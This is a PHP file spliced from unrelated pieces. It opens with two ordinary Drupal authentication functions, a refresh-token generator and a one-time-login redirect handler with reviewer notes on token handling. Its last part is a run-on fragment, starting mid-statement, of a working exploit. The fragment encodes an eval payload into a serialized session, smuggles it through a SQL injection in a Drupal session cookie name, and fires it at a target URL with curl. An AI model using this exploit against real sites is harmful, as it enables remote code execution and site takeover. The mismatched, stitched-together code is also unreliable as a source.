/**
 * Issue a new refresh token for the given user.
 *
 * Every refresh token already stored for that user is deleted before the new
 * one is created, so at most one refresh token per user is left in storage
 * after this call.
 *
 * @param int $uid
 *   The user ID.
 *
 * @return \RestfulTokenAuth
 *   The newly saved token entity.
 */
private function generateRefreshToken($uid) {
  // Find every refresh token currently stored for this user.
  $lookup = new \EntityFieldQuery();
  $lookup->entityCondition('entity_type', 'restful_token_auth');
  $lookup->entityCondition('bundle', 'refresh_token');
  $lookup->propertyCondition('uid', $uid);
  $existing = $lookup->execute();

  if (!empty($existing['restful_token_auth'])) {
    // Drop the old tokens before a replacement is issued.
    $stale_ids = array_keys($existing['restful_token_auth']);
    entity_delete_multiple('restful_token_auth', $stale_ids);
  }

  // Build and persist the replacement. The secret comes from
  // drupal_random_key() and is handed to create() as-is.
  // NOTE(review): whether the value is hashed before it is stored is not
  // visible from this method - confirm in the entity controller.
  $label = t('Refresh token for: @uid', array('@uid' => $uid));
  $token_entity = $this->create(array(
    'uid' => $uid,
    'type' => 'refresh_token',
    'created' => REQUEST_TIME,
    'name' => $label,
    'token' => drupal_random_key(),
  ));
  $this->save($token_entity);

  return $token_entity;
}
/**
 * Handle a successful interactive authentication attempt.
 *
 * Called by authentication listeners inheriting from
 * AbstractAuthenticationListener. Logs the use of the one-time login link,
 * shows a notice to the user, stores a password-reset token in the session
 * and redirects to the account edit page with that token in the query string.
 *
 * @param Request $request
 * @param TokenInterface $token
 *
 * @return Response never null
 */
public function onAuthenticationSuccess(Request $request, TokenInterface $token) {
  // Only the second element of the credentials (the link timestamp) is used.
  list(, $used_at) = $token->getCredentials();
  $account = $token->getUser()->getDrupalUser();

  watchdog('user', 'User %name used one-time login link at time %timestamp.', array('%name' => $account->name, '%timestamp' => $used_at));
  drupal_set_message(t('You have just used your one-time login link. It is no longer necessary to use this link to log in. Please change your password.'));

  // Let the user's password be changed without the current password check.
  // The same random value is kept in the session and sent in the redirect
  // URL. Because it travels in the query string it can end up in access logs
  // and browser history.
  // NOTE(review): the code that consumes and clears 'pass_reset_<uid>' is not
  // visible here - confirm the token is discarded once it has been used.
  $reset_token = drupal_random_key();
  $_SESSION['pass_reset_' . $account->uid] = $reset_token;
  $query = http_build_query(array('pass-reset-token' => $reset_token), '', '&');

  return new RedirectResponse('/user/' . $account->uid . '/edit?' . $query);
}
$code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code)))); } else { $code_inject = $code; } } $code_inject = rtrim($code_inject, ';'); $code_inject .= ';session_destroy();die("");'; if (strpos($url, 'www.') === 0) { $url = substr($url, 4); } $_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert'); $_SESSION['build_info']['args'][0] =& $_SESSION['string']; list(, $session_name) = explode('://', $url, 2); // use insecure cookie with sql inj. $cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); $password = user_hash_password('test'); $session_id = drupal_random_key(); $sec_ssid = drupal_random_key(); $serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION))); $inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- "; $cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid; $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, True); curl_setopt($ch, CURLOPT_RETURNTRANSFER, True); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5')); curl_setopt($ch, CURLOPT_COOKIE, $cookie); $output = curl_exec($ch); curl_close($ch); echo $output;